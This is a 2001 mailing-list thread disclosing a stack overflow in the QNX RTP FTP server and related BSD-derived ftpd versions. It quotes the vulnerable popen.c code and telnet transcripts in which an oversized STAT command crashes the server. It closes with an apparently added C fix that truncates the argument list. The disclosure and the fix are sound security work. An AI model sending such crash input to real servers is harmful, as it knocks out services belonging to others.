Re: QNX RTP ftpd stack overflow

2001-02-04 Thread Robert A. Seace

In the profound words of Przemyslaw Frasunek:
>
> On Fri, Feb 02, 2001 at 03:08:12PM -0800, Ted U wrote:
> > tested on qnx rtp as released on jan. 18 from get.qnx.com.  doesn't work.
> > i tried significantly more a's and nothing happens.  i get the normal
> > response from stat.
>
> Are you sure? This is output from the same version of QNX RTP, downloaded
> yesterday from get.qnx.com:
>
> riget:venglin:~> telnet cipsko 21
> Trying 192.168.1.32...
> Connected to cipsko.gadaczka.org.
> Escape character is '^]'.
> 220 cipsko FTP server (Version 5.60) ready.
> user venglin
> 331 Password required for venglin.
> pass x
> 230 User venglin logged in.
> stat a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
> a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
> a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
> a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a
> a a a a a a a a a a a a a a a a a
> Connection closed by foreign host.

I can't speak for the downloadable QNX RTP, however I
confirmed this same behavior with the FTP server that ships
with QNX 4.25 (their highly expensive previous RTOS, which
is NOT available for free download)...  The FTP server also
reports the same "Version 5.60", so I imagine they are one
and the same, anyway...

--
||||
||Rob Seace||   URL  || [EMAIL PROTECTED] ||
||  AKA: Agrajag   || http://www.magrathea.com/~ras/ || [EMAIL PROTECTED] ||
||||
"In those days spirits were brave, the stakes were high, men were real men,
 women were real women and small furry creatures from Alpha Centauri were
 real small furry creatures from Alpha Centauri." - THGTTG



Re: QNX RTP ftpd stack overflow

2001-02-03 Thread Przemyslaw Frasunek

On Fri, Feb 02, 2001 at 03:08:12PM -0800, Ted U wrote:
> tested on qnx rtp as released on jan. 18 from get.qnx.com.  doesn't work.
> i tried significantly more a's and nothing happens.  i get the normal
> response from stat.

Are you sure? This is output from the same version of QNX RTP, downloaded
yesterday from get.qnx.com:

riget:venglin:~> telnet cipsko 21
Trying 192.168.1.32...
Connected to cipsko.gadaczka.org.
Escape character is '^]'.
220 cipsko FTP server (Version 5.60) ready.
user venglin
331 Password required for venglin.
pass x
230 User venglin logged in.
stat a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a 
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a 
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a 
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a 
a a a a a a a a a a a a a a a a
Connection closed by foreign host.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: [EMAIL PROTECTED] ** PGP: D48684904685DF43EA93AFA13BE170BF *



Re: QNX RTP ftpd stack overflow

2001-02-02 Thread Ted U

tested on qnx rtp as released on jan. 18 from get.qnx.com.  doesn't work.
i tried significantly more a's and nothing happens.  i get the normal
response from stat.


  /-\
 / Ted Unangst - [EMAIL PROTECTED]  http://heorot.stanford.edu \
/"If you don't believe in the existence of evil, you have a lot to learn."\



Re: QNX RTP ftpd stack overflow

2001-02-02 Thread Przemyslaw Frasunek

On Fri, Feb 02, 2001 at 03:04:31PM -0800, Kris Kennaway wrote:
> > BTW. Old BSD derived ftpd is also used in opieftpd and SSLftpd. Both are
> >  vulnerable to this attack.
> In case anyone is wondering how old is old:

The same problem persists in the heimdal / kerberosIV ftpd implementations:

heimdal/appl/ftp/ftpd/popen.c and kerberosIV/appl/ftp/ftpd/popen.c:

char **pop, *argv[100], *gargv[1000];

/* break up string into pieces */
foo = NULL;
for (argc = 0, cp = program;; cp = NULL) {
        if (!(argv[argc++] = strtok_r(cp, " \t\n", &foo)))
                break;
}

Both are based on the BSD-derived ftpd version 6.00.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: [EMAIL PROTECTED] ** PGP: D48684904685DF43EA93AFA13BE170BF *



Re: QNX RTP ftpd stack overflow

2001-02-02 Thread Kris Kennaway

On Fri, Feb 02, 2001 at 08:03:09PM +0100, Przemyslaw Frasunek wrote:

> BTW. Old BSD derived ftpd is also used in opieftpd and SSLftpd. Both are
>  vulnerable to this attack.

In case anyone is wondering how old is old:


revision 1.5
date: 1996/11/20 22:12:50;  author: pst;  state: Exp;  lines: +9 -5
Truncate argument list to avoid buffer overflows.

Candidate for: 2.1 and 2.2


Kris
 PGP signature


QNX RTP ftpd stack overflow

2001-02-02 Thread Przemyslaw Frasunek

QNX RTP uses a BSD-derived FTP server, which is vulnerable to a strtok()-based
stack overflow.

Offending code from ftpd/popen.c:


char **pop, *argv[100], *gargv[1000], *vv[2];

for (argc = 0, cp = program;; cp = NULL)
        if (!(argv[argc++] = strtok(cp, " \t\n")))
                break;

/* glob each piece */
gargv[0] = argv[0];
for (gargc = argc = 1; argv[argc]; argc++) {
        argv[argc] = strdup(argv[argc]);


This code is called when the STAT command is issued. The overflow occurs when a
large number of arguments is supplied.

Identifying a vulnerable system:

220 quics.qnx.com FTP server (Version 5.60) ready.
user ftp
331 Guest login ok, send ident as password.
pass dupa
230 Guest login ok, access restrictions apply.
stat a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a 
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a 
a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a a 
a a a a a a a a a a a a a a a a a a a a a a a
Connection closed by foreign host.

BTW, the old BSD-derived ftpd is also used in opieftpd and SSLftpd. Both are
vulnerable to this attack.

--
* Fido: 2:480/124 ** WWW: http://www.frasunek.com/ ** NIC-HDL: PMF9-RIPE *
* Inet: [EMAIL PROTECTED] ** PGP: D48684904685DF43EA93AFA13BE170BF *
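The two popen.c excerpts in this thread (the strtok() loop in the QNX/BSD ftpd and the strtok_r() loop in heimdal/kerberosIV) share the same defect: the loop stores token pointers into a fixed argv[100] with no check on argc, so a STAT line with more than 99 whitespace-separated pieces writes past the array. The FreeBSD log entry quoted above ("Truncate argument list to avoid buffer overflows") describes the fix in one line. The following is an added illustration of that fix, not code from the thread or from any ftpd source tree: a bounded splitter that keeps the same tokenizer but stops storing once one slot short of capacity, so the NULL terminator always fits, and reports that truncation happened. The helper names (split_args_bounded, make_stat_line, tokens_after_split, split_truncates) and the constructed "/bin/ls -lgA a a a ..." command line are assumptions made for this example; the real string ftpd builds for STAT is not shown on the page.

```c
#define _POSIX_C_SOURCE 200809L
#include <stdbool.h>
#include <stddef.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define ARGV_MAX 100   /* same fixed size as argv[100] in the popen.c excerpts */

/*
 * Tokenize `program` in place like the ftpd loop does, but refuse to store
 * more than argv_cap - 1 tokens so argv[] always has room for the final NULL.
 * Returns the number of tokens stored; *truncated is set if any were dropped.
 * (Hypothetical helper written for this example, not ftpd code.)
 */
size_t split_args_bounded(char *program, char **argv, size_t argv_cap,
                          bool *truncated)
{
    char *save = NULL;
    char *cp = program;
    char *tok;
    size_t argc = 0;

    *truncated = false;
    if (argv_cap == 0)
        return 0;

    /* The vulnerable loop differs only in lacking the capacity test below:
     *   for (argc = 0, cp = program;; cp = NULL)
     *       if (!(argv[argc++] = strtok(cp, " \t\n"))) break;        */
    while ((tok = strtok_r(cp, " \t\n", &save)) != NULL) {
        cp = NULL;
        if (argc == argv_cap - 1) {   /* last slot is reserved for NULL */
            *truncated = true;
            break;
        }
        argv[argc++] = tok;
    }
    argv[argc] = NULL;
    return argc;
}

/*
 * Constructed input: a program name, one option, then n_args copies of "a",
 * mimicking the STAT lines in the thread's transcripts.  Caller frees it.
 */
char *make_stat_line(size_t n_args)
{
    const char *prefix = "/bin/ls -lgA";   /* assumed stand-in, not from the page */
    size_t len = strlen(prefix) + 2 * n_args + 1;
    char *buf = malloc(len);
    char *p;

    if (buf == NULL)
        return NULL;
    strcpy(buf, prefix);
    p = buf + strlen(prefix);
    for (size_t i = 0; i < n_args; i++) {
        *p++ = ' ';
        *p++ = 'a';
    }
    *p = '\0';
    return buf;
}

/* Split a constructed line with n_args arguments into a 100-slot argv[]. */
static size_t run_split(size_t n_args, bool *truncated)
{
    char *argv[ARGV_MAX];
    char *line = make_stat_line(n_args);
    size_t argc;

    if (line == NULL) {
        *truncated = false;
        return 0;
    }
    argc = split_args_bounded(line, argv, ARGV_MAX, truncated);
    free(line);   /* argv[] points into line; nothing reads it after this */
    return argc;
}

/* How many argv slots are filled for a line carrying n_args arguments. */
size_t tokens_after_split(size_t n_args)
{
    bool truncated;
    return run_split(n_args, &truncated);
}

/* Whether such a line exceeded the array and had to be truncated. */
bool split_truncates(size_t n_args)
{
    bool truncated;
    run_split(n_args, &truncated);
    return truncated;
}

int main(void)
{
    size_t counts[] = { 5, 97, 98, 300 };
    for (size_t i = 0; i < sizeof counts / sizeof counts[0]; i++)
        printf("%3zu args -> %3zu tokens stored, truncated=%d\n",
               counts[i], tokens_after_split(counts[i]),
               (int)split_truncates(counts[i]));
    return 0;
}
```

The interesting boundary is 97 versus 98 extra arguments: with the two leading tokens that makes 99 and 100 pieces, and 99 is the most a 100-entry array can hold while still ending in NULL. The unbounded loop does not stop there; it keeps incrementing argc until strtok() runs out of input, which is why the 300-argument lines in the transcripts drop the connection. Logging the truncated flag on the server side also gives a defender a cheap signal that someone sent an oversized STAT line.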